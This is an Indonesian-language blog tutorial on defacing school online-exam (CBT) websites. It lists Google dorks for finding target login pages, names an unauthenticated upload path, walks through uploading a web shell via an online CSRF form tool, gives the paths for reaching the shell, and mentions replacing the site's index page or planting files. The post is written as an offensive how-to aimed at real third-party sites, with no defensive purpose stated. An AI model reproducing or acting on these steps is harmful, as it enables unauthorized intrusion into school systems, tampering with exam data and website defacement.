Cara Deface Metode cbt online (Web Sekolah).


DEFACE METODE CBT

Assalamualaikum Wr Wb.
Kali Ini Saya Akan Membagikan Tutorial :
"Cara Deface Metode CBT
Bahan-Bahan :
-Dork
-Koneksi Internet
-Kopi + Udut

Langsung Saja Ke Materi.

Dork :
-inurl:/panel/pages/login.php(Use Your Brain)
-inurl:/login.php inurl:/cbt
-inurl:/login.php intitle:ujian online
-inurl:/login.php intitle:cbt beesmart


Kalo belom dapat,Lu Belum Beruntung :V

–Exploit
/panel/pages/upload-file.php
– CSRF Online(banyak di google)
1. Yang Pertama Dorking dulu dork diatas
2. Pilih targetnya,Lalu Tambahkan Exploitnya Dibelakang Pages
Contoh :
http:/www.target.com/login.php
Menjadi :
http:/www.target.com/panel/pages/upload-file.php
Kalo Targetnya "blank putih/warna putih kosong" berarti vuln.
3. Lalu kalo sudah dapat yang vuln, kita masukan link target nya ke CSRF Online,
Untuk POST FILE pilih uploadfile, atau ketik aja 'uploadfile' lalu kalo sudah klik Lock!

4. Lanjut Trus Upload Shell, Klik Aja Choose file Lalu Pilih Shell Kita Kalo Sudah Klik "upload" Kalo setelah diupload ada tulisan sukses berarti berhasil shell telah diupload
5. Trus Gimana Cara Ngakses Shellnya?
Untuk Mengakses Shellnya Tambahkan:

/images/namashell.php atau
/picture/namashell.php
dibelakang

Kalo berhasil maka akan muncul tampilan shell kalian.
wkwkw Kalau Sudah Kaya Gini
Kau Tau Sendiri Tebas Index Juga Bisa, Nitip File Juga Bisa
Dork : inurl:/panel/pages/login.php
Exploit : /panel/pages/upload-file.php
Cara akses Ganti Jadi :
/panel/pages/upload-file.php menjadi /images/NamaShell.php


Sekian Tutor Dari Admin.
Semoga Bermanfaat

Belum ada Komentar untuk "Cara Deface Metode cbt online (Web Sekolah)."

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel